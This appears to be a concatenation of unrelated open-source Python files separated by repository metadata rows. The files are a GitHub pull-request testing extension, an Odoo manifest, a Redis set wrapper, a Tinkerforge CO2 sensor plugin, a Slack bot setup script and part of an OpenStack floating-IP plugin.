'Github API. Default is drawn from the "TIMID_GITHUB_USER" '
'environment variable. Default: %(default)s',
)
group.add_argument(
'--github-pass',
default=os.environ.get('TIMID_GITHUB_PASS'),
help='Designate the password to use to authenticate to the '
'Github API. If not provided, and not available from the '
'keyring, will be prompted for.',
)
group.add_argument(
'--github-keyring-set',
default=False,
action='store_true',
help='Enable setting the password in the keyring. The entry '
'will be keyed by the Github API URL and by the username.',
)
# The pull request to test
group.add_argument(
'--github-pull',
help='Designate the pull request to test. This may be the '
'repository name and pull request number (e.g., "repo#1" or '
'"org/repo#1"), or a JSON object describing the pull request '
'(deprecated usage). This is the only option that enables the '
'Github extension.',
)
# The repository to pull from
group.add_argument(
'--github-repo',
default='git',
help='Designate the repository URL to clone from. This may '
'be the full URL to the repository, or it may be one of the '
'tokens "ssh", "git", or "https", designating to use the '
'specified access method from the repository specified in the '
'Github pull request. Default: %(default)s.',
)
# The repository to pull from
group.add_argument(
'--github-change-repo',
help='Designate the repository URL to merge the pull request '
'from. This may be the full URL to the repository, or it may '
'be one of the tokens "ssh", "git", or "https", designating to '
'use the specified access method from the repository specified '
'in the Github pull request. Defaults to the same method as '
'selected for --github-repo.',
)
# Some control options
group.add_argument(
'--github-status-url',
help='A URL to include in status updates made on the pull '
'request. Optional.',
)
# Override options
group.add_argument(
'--github-override',
help='DEPRECATED. Accepts a JSON object describing the status '
'to use in place of a successful status resulting from the test. '
'The JSON object should be a dictionary containing the "status" '
'key designating the final status (replaced by '
'"--github-override-status"). Optionally, the "text" key '
'(replaced by "--github-override-text") designates the status '
'text, and the "url" key (replaced by "--github-override-url") '
'designates the status URL.',
)
group.add_argument(
'--github-override-status',
choices=['pending', 'error', 'failure'],
help='Specifies an alternate status to use if tests complete '
'successfully. Must be "pending", "error", or "failure". If '
'used with "--github-override", this option takes precedence.',
)
group.add_argument(
'--github-override-text',
help='Specifies status text to include with the override '
'status specified by "--github-override-status". If used with '
'"--github-override", this option takes precedence.',
)
group.add_argument(
'--github-override-url',
help='Specifies a status URL to include with the override '
'status specified by "--github-override-status". If used with '
'"--github-override", this option takes precedence.',
)
@classmethod
def activate(cls, ctxt, args):
"""
Called to determine whether to activate the extension. This call
is made after processing command line arguments, and must
return either ``None`` or an initialized instance of the
extension. Note that this is a class method.
:param ctxt: An instance of ``timid.context.Context``.
:param args: An instance of ``argparse.Namespace`` containing
the result of processing command line arguments.
:returns: An instance of the extension class if the extension
has been activated, ``None`` if it has not. If this
method returns ``None``, no further extension
methods will be called.
"""
# If no pull request was specified, do nothing
if not args.github_pull:
return None
ctxt.emit('Github plugin activated')
# Ensure we have a password
service = 'timid-github!%s' % args.github_api
passwd = args.github_pass
if passwd is None and not args.github_keyring_set:
# Try getting it from the keyring
passwd = keyring.get_password(service, args.github_user)
if passwd is None:
# OK, try prompting for it
passwd = getpass.getpass('[%s] Password for "%s"> ' %
(args.github_api, args.github_user))
# Are we supposed to set it?
if args.github_keyring_set:
ctxt.emit('Saving password in keyring as requested')
keyring.set_password(service, args.github_user, passwd)
# Now we have authentication information, get a Github handle
gh = github.Github(args.github_user, passwd, args.github_api)
# Next, interpret the pull request designation
try:
# Try JSON first
pull_raw = json.loads(args.github_pull)
except ValueError:
# Raw string
repo, _sep, number = args.github_pull.partition('#')
# Interpret the number
if not number or not number.isdigit():
sys.exit('Invalid pull request number "%s"' % number)
number = int(number)
# Interpret the repo
if '/' not in repo:
user = gh.get_user()
repo = '%s/%s' % (user.login, repo)
# Look up the pull request
try:
repo = gh.get_repo(repo)
pull = repo.get_pull(number)
except Exception:
# No such pull request, I guess
sys.exit('Unable to resolve pull request "%s"' %
args.github_pull)
else:
# OK, we have raw JSON data; wrap it in a PullRequest
pull = gh.create_from_raw_data(
github.PullRequest.PullRequest, pull_raw)
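        # Accepted --github-pull forms, per the parsing above (identifiers
        # are placeholders, not taken from the original source):
        #   'myorg/myrepo#42'  -> explicit repository and pull request number
        #   'myrepo#42'        -> repository owned by the authenticated user
        #   '{...}'            -> a raw JSON dump of the pull request object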
ctxt.emit('Testing pull request %s#%d' %
(pull.base.repo.full_name, pull.number))
# Need the repository name
repo_name = pull.base.repo.name
# Also need the branches
repo_branch = pull.base.ref
change_branch = pull.head.ref
# Select the correct repository URL
repo_url = _select_url(args.github_repo, pull.base.repo)
ctxt.emit('Base repository %s' % repo_url, level=2)
# Select the correct change repository URL. If not
# independently specified, default to the same as the
# repo_url. Note: the URLs could legally be the same, as a PR
# could be made from one branch to another of the same
# repository.
change_url = _select_url(args.github_change_repo or args.github_repo,
pull.head.repo)
ctxt.emit('PR repository %s' % change_url, level=2)
# With the pull, we need to select an appropriate commit
last_commit = list(pull.get_commits())[-1]
# Set up the final status information
final_status = {
'status': 'success',
'text': 'Tests passed!',
'url': args.github_status_url,
}
# Handle the --github-override option
if args.github_override:
try:
override_raw = json.loads(args.github_override)
for key in final_status:
if key in override_raw:
final_status[key] = override_raw[key]
except ValueError:
pass
# Now we process the other override options
if args.github_override_status:
final_status['status'] = args.github_override_status
if args.github_override_text:
final_status['text'] = args.github_override_text
if args.github_override_url:
final_status['url'] = args.github_override_url
# Set some variables in the context for the use of any callers
ctxt.variables.declare_sensitive('github_api_password')
ctxt.variables.update({
'github_api': args.github_api,
'github_api_username': args.github_user,
'github_api_password': passwd,
'github_repo_name': repo_name,
'github_pull': '%s#%d' % (pull.base.repo.full_name, pull.number),
'github_base_repo': repo_url,
'github_base_branch': repo_branch,
'github_change_repo': change_url,
'github_change_branch': change_branch,
'github_success_status': final_status['status'],
'github_success_text': final_status['text'],
'github_success_url': final_status['url'],
'github_status_url': args.github_status_url,
})
# We are all set; initialize the extension
return cls(gh, pull, last_commit, args.github_status_url, final_status,
repo_name, repo_url, repo_branch, change_url, change_branch)
def __init__(self, gh, pull, last_commit, status_url, final_status,
repo_name, repo_url, repo_branch, change_url, change_branch):
"""
Initialize the ``GithubExtension`` instance.
:param gh: A ``github.Github`` object representing a handle
for interacting with the Github API.
:param pull: A ``github.PullRequest.PullRequest`` object
describing the pull request being tested.
:param last_commit: A ``github.Commit.Commit`` object
identifying the last commit contained in
the pull request. This is used for
updating the pull request status.
:param status_url: An optional status URL to include in the
status updates. If none is provided, use
``None``.
:param final_status: A dictionary of three keys: "status",
"text", and "url". This is used to set
the final status of the pull request
should tests pass.
:param repo_name: The bare name of the repository, excluding
the organization or user name.
:param repo_url: The repository URL to clone from.
:param repo_branch: The branch of the repository into which to
merge the pull request.
:param change_url: The repository URL of the repository
containing the pull request.
:param change_branch: The branch of the change repository from
which to merge the pull request.
"""
# Save the important data
self.gh = gh
self.pull = pull
self.last_commit = last_commit
self.status_url = status_url
self.final_status = final_status
self.repo_name = repo_name
self.repo_url = repo_url
self.repo_branch = repo_branch
self.change_url = change_url
self.change_branch = change_branch
# Remember what the last status was
self.last_status = None
def _set_status(self, ctxt, status, text=None, url=None):
"""
A helper method to set the status of a pull request.
:param ctxt: An instance of ``timid.context.Context``.
:param status: The desired status. Should be one of the
values "pending", "success", "failure", or
"error".
:param text: An optional textual description of the status.
:param url: An optional URL for the status.
"""
# Set the status
self.last_commit.create_status(
status,
url or github.GithubObject.NotSet,
text or github.GithubObject.NotSet,
)
ctxt.emit('Changing status to "%s" (text "%s"%s%s)' %
(status, text, ', url ' if url else '', url or ''),
debug=True)
# Remember it so we only make calls we need to
self.last_status = {
'status': status,
'text': text,
'url': url,
}
def read_steps(self, ctxt, steps):
"""
Called after reading steps, prior to adding them to the list of
test steps. This allows an extension to alter the list (in
place).
:param ctxt: An instance of ``timid.context.Context``.
:param steps: A list of ``timid.steps.Step`` instances.
"""
# Get our file name
fname = inspect.getsourcefile(self.__class__)
# Prepend our steps to the list of steps read
ctxt.emit('Prepending clone and merge steps', debug=True)
steps[0:0] = [
# First step will be to clone the repository
timid.Step(timid.StepAddress(fname, 0),
CloneAction(ctxt, self),
name='Cloning repository',
description='Clone the Github repository'),
# Second step will be to merge the pull request
timid.Step(timid.StepAddress(fname, 1),
MergeAction(ctxt, self),
name='Merging pull request',
description='Merge the Github pull request'),
]
def pre_step(self, ctxt, step, idx):
"""
Called prior to executing a step.
:param ctxt: An instance of ``timid.context.Context``.
:param step: An instance of ``timid.steps.Step`` describing
the step to be executed.
:param idx: The index of the step in the list of steps.
:returns: A ``True`` value if the step is to be skipped. Any
``False`` value (including ``None``) will result in
the step being executed as normal.
"""
# Update the pull request status
self._set_status(ctxt, 'pending', step.name, self.status_url)
return None
def post_step(self, ctxt, step, idx, result):
"""
Called after executing a step.
:param ctxt: An instance of ``timid.context.Context``.
:param step: An instance of ``timid.steps.Step`` describing
the step that was executed.
:param idx: The index of the step in the list of steps.
:param result: An instance of ``timid.steps.StepResult``
describing the result of executing the step.
May be altered by the extension, e.g., to set
the ``ignore`` attribute.
"""
if not result:
# The step failed; compute a status update
msg = result.msg
if result.state == timid.FAILURE:
status = 'failure'
if not msg:
msg = 'Failed: %s' % step.name
else:
status = 'error'
if not msg:
if result.state != timid.ERROR:
msg = ('Unknown timid state "%s" during step: %s' %
(result.state, step.name))
else:
msg = 'Error: %s' % step.name
# Update the status
self._set_status(ctxt, status, msg, self.status_url)
def finalize(self, ctxt, result):
"""
Called at the end of processing. This call allows the extension
to emit any additional data, such as timing information, prior
to ``timid``'s exit. The extension may also alter the return
value.
:param ctxt: An instance of ``timid.context.Context``.
:param result: The return value of the basic ``timid`` call,
or an ``Exception`` instance if an exception
was raised. Without the extension, this would
be passed directly to ``sys.exit()``.
:returns: Should return ``result`` unless the extension wishes
to change the return value.
"""
# If result is None, update the status to success
if result is None:
self._set_status(ctxt, **self.final_status)
elif isinstance(result, Exception):
# An exception occurred while running timid; log it as an
# error status
self._set_status(ctxt, 'error',
'Exception while running timid: %s' % result,
self.status_url)
elif self.last_status and self.last_status['status'] == 'pending':
# A test failed and we haven't reported it; do so
self._set_status(ctxt, 'failure', 'Testing failed: %s' % result,
self.status_url)
return result
| apache-2.0 | -739,504,360,498,348,800 | 36.721348 | 79 | 0.573365 | false |
maljac/odoo-addons | report_extended_purchase/__openerp__.py | 1 | 1599 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Report Configurator - Purchase',
'version': '1.0',
'category': 'Reporting Subsystem',
'sequence': 14,
'summary': '',
'description': """
Report Configurator - Purchase
==============================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'report_extended',
'purchase',
],
'data': [
'views/report_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': True,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,613,577,968,119,786,000 | 30.98 | 78 | 0.554096 | false |
j4mie/rediset | rediset/sets.py | 1 | 1992 | from .base import Node, OperationNode
class SetNode(Node):
"""
Represents a Redis set
Note that this class does *not* try too hard to look like a Python
set. For example, you cannot pass an iterable into its constructor
to provide the members of the set. This is because a set in Redis
may or may not already contain elements. A non-existent set in Redis
is equivalent to an existing set with zero items. So this class should
be thought of as an interface to an *existing* Redis set, providing
an API to add or remove elements.
"""
def __init__(self, rediset, key):
self.rs = rediset
self.key = key
def add(self, *values):
self.rs.redis.sadd(self.prefixed_key, *values)
def remove(self, *values):
self.rs.redis.srem(self.prefixed_key, *values)
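# Illustrative usage sketch (assumes `rs` is a Rediset-style wrapper exposing
# a `redis` client and key prefixing, as SetNode expects; the names below are
# placeholders, not part of the original source):
#
#     friends = SetNode(rs, 'friends')
#     friends.add('alice', 'bob')
#     friends.remove('bob')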
class IntersectionNode(OperationNode):
"""
Represents the result of an intersection of one or more other sets
"""
@property
def key(self):
return "intersection(%s)" % ",".join(sorted(self.child_keys()))
def perform_operation(self):
return self.rs.redis.sinterstore(self.prefixed_key, self.prefixed_child_keys())
class UnionNode(OperationNode):
"""
Represents the result of a union of one or more other sets
"""
@property
def key(self):
return "union(%s)" % ",".join(sorted(self.child_keys()))
def perform_operation(self):
return self.rs.redis.sunionstore(self.prefixed_key, self.prefixed_child_keys())
class DifferenceNode(OperationNode):
"""
Represents the result of the difference between the first set
and all the successive sets
"""
@property
def key(self):
child_keys = self.child_keys()
child_keys = child_keys[0:1] + sorted(child_keys[1:])
return "difference(%s)" % ",".join(child_keys)
def perform_operation(self):
return self.rs.redis.sdiffstore(self.prefixed_key, self.prefixed_child_keys())
| unlicense | 551,889,515,070,679,300 | 27.056338 | 87 | 0.659137 | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/co2_v2/co2_v2.py | 1 | 3550 | # -*- coding: utf-8 -*-
"""
CO2 2.0 Plugin
Copyright (C) 2019 Olaf Lüke <[email protected]>
co2_v2.py: CO2 2.0 Plugin Implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_co2_v2 import BrickletCO2V2
from brickv.plot_widget import PlotWidget, CurveValueWrapper
from brickv.callback_emulator import CallbackEmulator
class CO2V2(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletCO2V2, *args)
self.co2 = self.device
self.cbe_all_values = CallbackEmulator(self,
self.co2.get_all_values,
None,
self.cb_all_values,
self.increase_error_count)
self.current_co2 = CurveValueWrapper() # int, ppm
self.current_temperature = CurveValueWrapper() # float, °C
self.current_humidity = CurveValueWrapper() # float, %RH
plots_co2 = [('CO2', Qt.red, self.current_co2, '{} PPM'.format)]
self.plot_widget_co2 = PlotWidget('CO2 [PPM]', plots_co2, y_resolution=1.0)
plots_temperature = [('Temperature', Qt.red, self.current_temperature, '{} °C'.format)]
self.plot_widget_temperature = PlotWidget('Temperature [°C]', plots_temperature, y_resolution=0.01)
plots_humidity = [('Relative Humidity', Qt.red, self.current_humidity, '{} %RH'.format)]
self.plot_widget_humidity = PlotWidget('Relative Humidity [%RH]', plots_humidity, y_resolution=0.01)
layout_plot1 = QHBoxLayout()
layout_plot1.addWidget(self.plot_widget_co2)
layout_plot2 = QHBoxLayout()
layout_plot2.addWidget(self.plot_widget_temperature)
layout_plot2.addWidget(self.plot_widget_humidity)
layout_main = QVBoxLayout(self)
layout_main.addLayout(layout_plot1)
layout_main.addLayout(layout_plot2)
def cb_all_values(self, values):
self.current_co2.value = values.co2_concentration
self.current_temperature.value = values.temperature / 100.0
self.current_humidity.value = values.humidity / 100.0
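        # Temperature and humidity arrive as integer hundredths, so an
        # illustrative raw reading of 2312 would be displayed as 23.12.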
def start(self):
self.cbe_all_values.set_period(250)
self.plot_widget_co2.stop = False
self.plot_widget_temperature.stop = False
self.plot_widget_humidity.stop = False
def stop(self):
self.cbe_all_values.set_period(0)
self.plot_widget_co2.stop = True
self.plot_widget_temperature.stop = True
self.plot_widget_humidity.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletCO2V2.DEVICE_IDENTIFIER
| gpl-2.0 | 1,356,080,298,779,096,300 | 37.543478 | 108 | 0.666949 | false |
dataloop/slactorbot | setup.py | 1 | 1466 | """
Slactorbot - A Python Slack Bot with hot patch!
"""
import os
import re
from setuptools import find_packages, setup
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def get_version():
VERSIONFILE = "slactorbot/_version.py"
verstrline = fread(VERSIONFILE).strip()
vsre = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(vsre, verstrline, re.M)
if mo:
VERSION = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." %
(VERSIONFILE, ))
return VERSION
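# get_version() expects slactorbot/_version.py to contain a line such as
# (version number illustrative):
#
#     __version__ = "0.1.0"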
dependencies = ['thespian', 'slackclient', 'pyyaml', 'requests']
setup(
name='slactorbot',
version=get_version(),
url='https://github.com/dataloop/slactorbot',
download_url="https://github.com/dataloop/slactorbot/tarball/v" + get_version(),
license="MIT",
author='Steven Acreman',
author_email='[email protected]',
description='A Python Slack Bot with hot patch!',
keywords="slack bot",
packages=find_packages(exclude=['tests']),
exclude_package_data={'': ['config.yaml']},
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
"slactorbot = slactorbot.bot:start",
],
},
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: System Administrators"
])
| mit | -8,639,457,963,312,591,000 | 27.192308 | 84 | 0.61869 | false |
rackerlabs/quark | quark/plugin_modules/floating_ips.py | 1 | 24567 | # Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from quark import billing
from quark.db import api as db_api
from quark.db import ip_types
from quark.drivers import floating_ip_registry as registry
from quark import exceptions as q_exc
from quark import ipam
from quark import plugin_views as v
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
quark_router_opts = [
cfg.StrOpt('floating_ip_segment_name', default='floating_ip',
help=_('Segment name for floating IP subnets')),
cfg.StrOpt('floating_ip_ipam_strategy', default='ANY',
help=_('Override the network IPAM stategy for floating '
"allocation. Use 'NETWORK' to fall back to the "
"network's strategy")),
]
CONF.register_opts(quark_router_opts, 'QUARK')
def _get_network(context, network_id):
network = db_api.network_find(context, id=network_id, scope=db_api.ONE)
if not network:
raise n_exc.NetworkNotFound(net_id=network_id)
return network
def _get_port(context, port_id):
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if not port.ip_addresses or len(port.ip_addresses) == 0:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
return port
def _get_fixed_ip(context, given_fixed_ip, port):
if not given_fixed_ip:
fixed_ip = _get_next_available_fixed_ip(port)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(
port_id=port.id)
else:
fixed_ip = next((ip for ip in port.ip_addresses
if (ip['address_readable'] == given_fixed_ip and
ip.get('address_type') == ip_types.FIXED)),
None)
if not fixed_ip:
raise q_exc.FixedIpDoesNotExistsForPort(
fixed_ip=given_fixed_ip, port_id=port.id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') in (ip_types.FLOATING,
ip_types.SCALING) and
ip.fixed_ip['address_readable'] == given_fixed_ip)):
raise q_exc.PortAlreadyContainsFloatingIp(
port_id=port.id)
return fixed_ip
def _allocate_ip(context, network, port, requested_ip_address, address_type):
new_addresses = []
ip_addresses = []
if requested_ip_address:
ip_addresses.append(requested_ip_address)
seg_name = CONF.QUARK.floating_ip_segment_name
strategy_name = CONF.QUARK.floating_ip_ipam_strategy
if strategy_name.upper() == 'NETWORK':
strategy_name = network.get("ipam_strategy")
port_id = port
if port:
port_id = port.id
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.allocate_ip_address(context, new_addresses, network.id,
port_id, CONF.QUARK.ipam_reuse_after,
seg_name, version=4,
ip_addresses=ip_addresses,
address_type=address_type)
return new_addresses[0]
def _get_next_available_fixed_ip(port):
floating_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') in
(ip_types.FLOATING, ip_types.SCALING)]
fixed_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') == ip_types.FIXED]
if not fixed_ips or len(fixed_ips) == 0:
return None
used = [ip.fixed_ip.address for ip in floating_ips
if ip and ip.fixed_ip]
return next((ip for ip in sorted(fixed_ips,
key=lambda ip: ip.get('allocated_at'))
if ip.address not in used), None)
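# Illustrative walk-through (addresses are placeholders): if a port carries
# fixed IPs 10.0.0.2 (allocated first) and 10.0.0.3, and a floating IP is
# already bound to 10.0.0.2, the helper above returns the 10.0.0.3 entry;
# if every fixed IP is already in use it returns None.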
def _get_ips_by_type(context, ip_type, filters=None, fields=None):
filters = filters or {}
filters['_deallocated'] = False
filters['address_type'] = ip_type
ips = db_api.floating_ip_find(context, scope=db_api.ALL, **filters)
return ips
def _create_flip(context, flip, port_fixed_ips):
"""Associates the flip with ports and creates it with the flip driver
:param context: neutron api request context.
:param flip: quark.db.models.IPAddress object representing a floating IP
:param port_fixed_ips: dictionary of the structure:
{"<id of port>": {"port": <quark.db.models.Port>,
"fixed_ip": "<fixed ip address>"}}
:return: None
"""
if port_fixed_ips:
context.session.begin()
try:
ports = [val['port'] for val in port_fixed_ips.values()]
flip = db_api.port_associate_ip(context, ports, flip,
port_fixed_ips.keys())
for port_id in port_fixed_ips:
fixed_ip = port_fixed_ips[port_id]['fixed_ip']
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
flip_driver.register_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# alexm: Notify from this method for consistency with _delete_flip
billing.notify(context, 'ip.associate', flip)
def _get_flip_fixed_ip_by_port_id(flip, port_id):
for fixed_ip in flip.fixed_ips:
if fixed_ip.ports[0].id == port_id:
return fixed_ip
def _update_flip(context, flip_id, ip_type, requested_ports):
"""Update a flip based IPAddress
:param context: neutron api request context.
:param flip_id: id of the flip or scip
:param ip_type: ip_types.FLOATING | ip_types.SCALING
:param requested_ports: dictionary of the structure:
{"port_id": "<id of port>", "fixed_ip": "<fixed ip address>"}
:return: quark.models.IPAddress
"""
    # This dict of sets holds flips that require notifications.
# Using sets to avoid dups, if any.
notifications = {
'ip.associate': set(),
'ip.disassociate': set()
}
context.session.begin()
try:
flip = db_api.floating_ip_find(context, id=flip_id, scope=db_api.ONE)
if not flip:
if ip_type == ip_types.SCALING:
raise q_exc.ScalingIpNotFound(id=flip_id)
raise q_exc.FloatingIpNotFound(id=flip_id)
current_ports = flip.ports
# Determine what ports are being removed, being added, and remain
req_port_ids = [request_port.get('port_id')
for request_port in requested_ports]
curr_port_ids = [curr_port.id for curr_port in current_ports]
added_port_ids = [port_id for port_id in req_port_ids
if port_id and port_id not in curr_port_ids]
removed_port_ids = [port_id for port_id in curr_port_ids
if port_id not in req_port_ids]
remaining_port_ids = set(curr_port_ids) - set(removed_port_ids)
# Validations just for floating ip types
if (ip_type == ip_types.FLOATING and curr_port_ids and
curr_port_ids == req_port_ids):
d = dict(flip_id=flip_id, port_id=curr_port_ids[0])
raise q_exc.PortAlreadyAssociatedToFloatingIp(**d)
if (ip_type == ip_types.FLOATING and
not curr_port_ids and not req_port_ids):
raise q_exc.FloatingIpUpdateNoPortIdSupplied()
port_fixed_ips = {}
# Keep the ports and fixed ips that have not changed
for port_id in remaining_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
# Disassociate the ports and fixed ips from the flip that were
# associated to the flip but are not anymore
for port_id in removed_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
flip = db_api.port_disassociate_ip(context, [port], flip)
notifications['ip.disassociate'].add(flip)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
if fixed_ip:
flip = db_api.floating_ip_disassociate_fixed_ip(
context, flip, fixed_ip)
# Validate the new ports with the flip and associate the new ports
# and fixed ips with the flip
for port_id in added_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.FLOATING)):
raise q_exc.PortAlreadyContainsFloatingIp(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.SCALING)):
raise q_exc.PortAlreadyContainsScalingIp(port_id=port_id)
fixed_ip = _get_next_available_fixed_ip(port)
LOG.info('new fixed ip: %s' % fixed_ip)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
flip = db_api.port_associate_ip(context, [port], flip, [port_id])
notifications['ip.associate'].add(flip)
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
# If there are not any remaining ports and no new ones are being added,
# remove the floating ip from unicorn
if not remaining_port_ids and not added_port_ids:
flip_driver.remove_floating_ip(flip)
# If new ports are being added but there previously was not any ports,
# then register a new floating ip with the driver because it is
# assumed it does not exist
elif added_port_ids and not curr_port_ids:
flip_driver.register_floating_ip(flip, port_fixed_ips)
else:
flip_driver.update_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# Send notifications for possible associate/disassociate events
for notif_type, flip_set in notifications.iteritems():
for flip in flip_set:
billing.notify(context, notif_type, flip)
# NOTE(blogan): ORM does not seem to update the model to the real state
# of the database, so I'm doing an explicit refresh for now.
context.session.refresh(flip)
return flip
def _delete_flip(context, id, address_type):
filters = {'address_type': address_type, '_deallocated': False}
flip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE, **filters)
if not flip:
raise q_exc.FloatingIpNotFound(id=id)
current_ports = flip.ports
if address_type == ip_types.FLOATING:
if current_ports:
current_ports = [flip.ports[0]]
elif address_type == ip_types.SCALING:
current_ports = flip.ports
context.session.begin()
try:
strategy_name = flip.network.get('ipam_strategy')
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.deallocate_ip_address(context, flip)
if current_ports:
db_api.port_disassociate_ip(context, current_ports, flip)
if flip.fixed_ips:
db_api.floating_ip_disassociate_all_fixed_ips(context, flip)
context.session.commit()
except Exception:
context.session.rollback()
raise
try:
driver = registry.DRIVER_REGISTRY.get_driver()
driver.remove_floating_ip(flip)
except Exception as e:
LOG.error('There was an error when trying to delete the floating ip '
'on the unicorn API. The ip has been cleaned up, but '
'may need to be handled manually in the unicorn API. '
'Error: %s' % e.message)
# alexm: Notify from this method because we don't have the flip object
# in the callers
billing.notify(context, 'ip.disassociate', flip)
def create_floatingip(context, content):
"""Allocate or reallocate a floating IP.
:param context: neutron api request context.
:param content: dictionary describing the floating ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
network_id = content.get('floating_network_id')
# TODO(blogan): Since the extension logic will reject any requests without
# floating_network_id, is this still needed?
if not network_id:
raise n_exc.BadRequest(resource='floating_ip',
msg='floating_network_id is required.')
fixed_ip_address = content.get('fixed_ip_address')
ip_address = content.get('floating_ip_address')
port_id = content.get('port_id')
port = None
port_fixed_ip = {}
network = _get_network(context, network_id)
if port_id:
port = _get_port(context, port_id)
fixed_ip = _get_fixed_ip(context, fixed_ip_address, port)
port_fixed_ip = {port.id: {'port': port, 'fixed_ip': fixed_ip}}
flip = _allocate_ip(context, network, port, ip_address, ip_types.FLOATING)
_create_flip(context, flip, port_fixed_ip)
return v._make_floating_ip_dict(flip, port_id)
def update_floatingip(context, id, content):
"""Update an existing floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
if 'port_id' not in content:
raise n_exc.BadRequest(resource='floating_ip',
msg='port_id is required.')
requested_ports = []
if content.get('port_id'):
requested_ports = [{'port_id': content.get('port_id')}]
flip = _update_flip(context, id, ip_types.FLOATING, requested_ports)
return v._make_floating_ip_dict(flip)
def delete_floatingip(context, id):
"""deallocate a floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
"""
LOG.info('delete_floatingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.FLOATING)
def get_floatingip(context, id, fields=None):
"""Retrieve a floating IP.
:param context: neutron api request context.
:param id: The UUID of the floating IP.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_floatingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.FLOATING, '_deallocated': False}
